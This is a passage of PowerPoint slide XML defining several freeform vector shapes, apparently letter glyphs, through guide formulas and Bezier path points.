                  <a:lnTo>
                    <a:pt x="207" y="15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95" name="Freeform 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D112A609-E09A-4774-A617-BDF952274660}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId36"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4059239" y="3232151"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 135 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="135" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="204"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="149" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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96" name="Freeform 237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836051A2-EE17-4CC1-8704-097F66C1AD1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId37"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4168776" y="3232151"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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97" name="Freeform 238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADAB02D-DF19-4B4E-8E6F-C58DC777093F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId38"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4276726" y="3259138"/>
              <a:ext cx="100013" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 34 h 329"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 34 h 329"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 299 h 329"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 299 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="77" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="137" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="158"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="77" y="147"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="87"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="299"/>
                    <a:pt x="0" y="299"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="299"/>
                    <a:pt x="107" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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98" name="Freeform 239">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933B05D1-106C-4C08-BA66-735D8A3683F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId39"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425951" y="3259138"/>
              <a:ext cx="26988" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 63 w 63"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 32 w 63"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 63"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 63"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 63 w 63"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="63" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="166"/>
                    <a:pt x="48" y="153"/>
                    <a:pt x="32" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="63" y="200"/>
                    <a:pt x="63" y="18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99" name="Freeform 240">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{412B7948-DEF7-4643-9BF4-B66A7393C26B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId40"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4506914" y="3201988"/>
              <a:ext cx="85725" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 169 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="169" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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00" name="Freeform 241">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59FF38F-6C29-4620-9323-DF2BB37979C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId41"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4618039" y="3201988"/>
              <a:ext cx="85725" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200 w 204"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 187 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 169 w 204"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 204"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 204"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 18 w 204"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 204"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 200 w 204"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="200" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="204" y="22"/>
                    <a:pt x="204" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="9"/>
                    <a:pt x="197" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="169" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="8" y="388"/>
                    <a:pt x="18" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="200"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01" name="Freeform 242">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE86FA02-308F-492B-BEFE-8698DA04C18A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId42"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4727576" y="3257551"/>
              <a:ext cx="98425" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 233"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 208 w 233"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 233 w 233"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 213 w 233"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 233"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 233"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 233"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 233"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 233"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 233"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 67 w 233"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 85 w 233"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 233"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 233"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 233"/>
